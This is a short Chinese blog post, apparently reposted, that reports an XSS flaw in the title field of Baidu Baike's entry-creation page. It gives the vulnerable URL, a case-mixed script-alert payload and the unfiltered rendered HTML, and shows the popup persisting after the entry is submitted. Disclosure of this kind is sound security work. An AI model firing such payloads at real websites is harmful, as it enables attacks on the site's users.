发现方式：XX创建词条，然后标题处存在xss漏洞

漏洞链接 :

https://baike.baidu.com/page/createindex?lemmaTitle=

这里可以直接插入xss代码，或者链接后插入

https://baike.baidu.com/page/createindex?lemmaTitle=<sCriPt>alert(/xss/)</sCripT>/

 然后呢，点击浏览，会弹出。标题是没有经过任何的过滤的

看下，代码

<h1 ><sCriPt>alert(/xss/)</sCripT></h1>

是没有任何过滤和限制的，。

然后在提交一下，在我的词条处点击查看，还是会弹窗，证明词条标题处是没有过滤的

https://baike.baidu.com/usercenter/lemmas#auditing

转载至：https://codeantenna.com/a/TrDWBWRDkV

文章作者：白昼小丑

感谢您抽出

.

.

来阅读本文

点它，分享点赞在看都在这里